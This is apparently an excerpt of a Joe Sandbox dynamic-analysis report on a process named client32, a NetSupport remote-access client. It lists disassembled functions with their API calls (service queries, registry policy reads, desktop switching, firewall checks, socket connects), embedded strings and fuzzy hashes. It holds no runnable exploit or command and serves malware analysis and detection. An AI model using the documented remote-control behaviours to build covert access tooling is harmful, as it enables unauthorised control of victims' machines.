                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                  • String ID: Fs$CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                  • API String ID: 1594747848-4184434473
                                                                                  • Opcode ID: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                                  • Instruction ID: ea278f5fd7360d42281fd81be3dd0b2008dee34a98883b586f11dcb677731357
                                                                                  • Opcode Fuzzy Hash: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                                  • Instruction Fuzzy Hash: 04317075A40229ABDB149FE58D85FAEFBB8FB48709F100528FA11A7644D6746900CBA4
                                                                                  Function 1102D360 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 289servicesleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,50D94AA1,?,00000000,00000000), ref: 1102D594
                                                                                  • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
                                                                                  • Sleep.KERNEL32(00000032), ref: 1102D5D6
                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
                                                                                  • Sleep.KERNEL32(000003E8), ref: 1102D632
                                                                                  • CloseHandle.KERNEL32(?), ref: 1102D65F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                  • String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                  • API String ID: 83693535-1096744297
                                                                                  • Opcode ID: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                  • Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
                                                                                  • Opcode Fuzzy Hash: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                  • Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50
                                                                                  Function 1102CB60 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
                                                                                  • GetTickCount.KERNEL32 ref: 1102CBCA
                                                                                    • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                  • GetTickCount.KERNEL32 ref: 1102CCC4
                                                                                    • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                    • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
                                                                                  • CloseHandle.KERNEL32(?), ref: 1102CDD8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                  • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                  • API String ID: 596640303-1725438197
                                                                                  • Opcode ID: 82ce7ff8cbb2b5358d8abc1fced85d0fa1010a380384f47bd129b7024de676e6
                                                                                  • Instruction ID: dd5538bcf42f02d8fc6af97e821dff418cbfa7b7de554536dce4014f8caac367
                                                                                  • Opcode Fuzzy Hash: 82ce7ff8cbb2b5358d8abc1fced85d0fa1010a380384f47bd129b7024de676e6
                                                                                  • Instruction Fuzzy Hash: 62817E34E0021A9BDF04DBE4CD90FEEF7B5AF55348F508259E82667284DB74BA05CBA1
                                                                                  Function 11062220 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106227A
                                                                                    • Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 11061C9C
                                                                                    • Part of subcall function 11061C60: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11061CF4
                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110622CB
                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11062385
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 110623A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Enum$Open$CloseValue
                                                                                  • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                  • API String ID: 2823542970-1528906934
                                                                                  • Opcode ID: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                                  • Instruction ID: 91282df486796d8d45fa06834b6704f4eef725291cd5fd64ae30f86ab301b8e1
                                                                                  • Opcode Fuzzy Hash: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                                  • Instruction Fuzzy Hash: F6415E79A0022D6BD724CF51DC81FEAB7BCEF58748F1041D9EA49A6140DBB06E85CFA1
                                                                                  Function 11138580 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • GetTickCount.KERNEL32 ref: 111385E2
                                                                                    • Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                    • Part of subcall function 11096D90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                    • Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                    • Part of subcall function 11096D90: CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                                  • GetTickCount.KERNEL32 ref: 111385F1
                                                                                  • _memset.LIBCMT ref: 11138633
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
                                                                                  • _strrchr.LIBCMT ref: 11138658
                                                                                  • _free.LIBCMT ref: 111386AA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                  • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                  • API String ID: 711243594-1270230032
                                                                                  • Opcode ID: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                                  • Instruction ID: 5891752c4c55aadc8c036c0ba7fa863b534ef4ea4707a2085efa3f6ff011156f
                                                                                  • Opcode Fuzzy Hash: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                                  • Instruction Fuzzy Hash: D8419C7AE0012E9BD710DB755C85FDAF778EB5531CF0001B9EC0997284EAB1A944CBE1
                                                                                  Function 6F9F7610 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 111networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ioctlsocket.WSOCK32 ref: 6F9F7642
                                                                                  • connect.WSOCK32(00000000,?,?), ref: 6F9F7659
                                                                                  • WSAGetLastError.WSOCK32(00000000,?,?), ref: 6F9F7660
                                                                                  • _memmove.LIBCMT ref: 6F9F76D3
                                                                                  • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6F9F76F3
                                                                                  • GetTickCount.KERNEL32 ref: 6F9F7717
                                                                                  • ioctlsocket.WSOCK32 ref: 6F9F775C
                                                                                  • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9F7762
                                                                                  • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6F9F777A
                                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6F9F778B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                  • String ID: *BlockingIO$ConnectTimeout$General
                                                                                  • API String ID: 4218156244-2969206566
                                                                                  • Opcode ID: ffdfeccdbb218953b4301ea6460260740405b746f7542d28b736c30a858ad673
                                                                                  • Instruction ID: 52a718788b8baf993d0f99b02ce40a1c79ef2e556269275cc467864f6497879e
                                                                                  • Opcode Fuzzy Hash: ffdfeccdbb218953b4301ea6460260740405b746f7542d28b736c30a858ad673
                                                                                  • Instruction Fuzzy Hash: 4F411A71D153149BE720CB64CD48BED73BEAF45314F00419AD909961C1EB74EA96CBA2
                                                                                  Function 11133B00 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 107COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 11133B70
                                                                                  • GetTickCount.KERNEL32 ref: 11133BA1
                                                                                  • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
                                                                                  • GetTickCount.KERNEL32 ref: 11133BBC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$FolderPathwsprintf
                                                                                  • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe$.#v
                                                                                  • API String ID: 1170620360-2953616677
                                                                                  • Opcode ID: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                                  • Instruction ID: ff3437da4bce093be243bc4ea55ba4e08a4d9634e929d706e548d7c9b68f93f5
                                                                                  • Opcode Fuzzy Hash: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                                  • Instruction Fuzzy Hash: 68315BB5E1022EABD3209BB19D80FEDF3789B9031DF100065E815A7644EF71B9048795
                                                                                  Function 11027200 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _strtok.LIBCMT ref: 11027286
                                                                                  • _strtok.LIBCMT ref: 110272C0
                                                                                  • Sleep.KERNEL32(110302E7,?,*max_sessions,0000000A,00000000,?,00000002), ref: 110273B4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _strtok$Sleep
                                                                                  • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                  • API String ID: 2009458258-3774545468
                                                                                  • Opcode ID: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                                  • Instruction ID: 2d05d95278d551eaaa07460440d96754ad32abd10519b78537541f164f63ece7
                                                                                  • Opcode Fuzzy Hash: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                                  • Instruction Fuzzy Hash: EE513536E0166A8BDB11CFE4CC81FEEFBF4AF95308F644169E81567244D7316849CB92
                                                                                  Function 6F9F8D00 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 144COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6FA067B5), ref: 6F9F8D6B
                                                                                    • Part of subcall function 6F9F4F70: LoadLibraryA.KERNEL32(psapi.dll,?,6F9F8DC8), ref: 6F9F4F78
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 6F9F8DCB
                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6F9F8DD8
                                                                                  • FreeLibrary.KERNEL32(?), ref: 6F9F8EBF
                                                                                    • Part of subcall function 6F9F4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6F9F4FC4
                                                                                    • Part of subcall function 6F9F4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6F9F8E0D,00000000,?,6F9F8E0D,00000000,?,00000FA0,?), ref: 6F9F4FE4
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6F9F8EAE
                                                                                    • Part of subcall function 6F9F5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6F9F5014
                                                                                    • Part of subcall function 6F9F5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6F9F8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6F9F5034
                                                                                    • Part of subcall function 6F9F2420: _strrchr.LIBCMT ref: 6F9F242E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                                                  • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                  • API String ID: 2714439535-3484705551
                                                                                  • Opcode ID: 21a7a5c3e0191f05daf18a2bbc70188b723d512a23a0d941633914dbbb5c1f8c
                                                                                  • Instruction ID: 77fc12090cf35290e5f8e2d58956aa6548d7e867631b907739be5f17deccaa08
                                                                                  • Opcode Fuzzy Hash: 21a7a5c3e0191f05daf18a2bbc70188b723d512a23a0d941633914dbbb5c1f8c
                                                                                  • Instruction Fuzzy Hash: BA41E672D05328ABDB65DB52DC44FEAB3BCEB45714F004065EA06E21C0E774EA86CF61
                                                                                  Function 111037D0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 111037EC
                                                                                  • GetThreadDesktop.USER32(00000000), ref: 111037F3
                                                                                  • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11103803
                                                                                  • SetThreadDesktop.USER32(00000000), ref: 11103810
                                                                                  • CloseDesktop.USER32(00000000), ref: 11103829
                                                                                  • GetLastError.KERNEL32 ref: 11103831
                                                                                  • CloseDesktop.USER32(00000000), ref: 11103847
                                                                                  • GetLastError.KERNEL32 ref: 1110384F
                                                                                  Strings
                                                                                  • SetThreadDesktop(%s) ok, xrefs: 1110381B
                                                                                  • SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
                                                                                  • OpenDesktop(%s) failed, e=%d, xrefs: 11103857
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
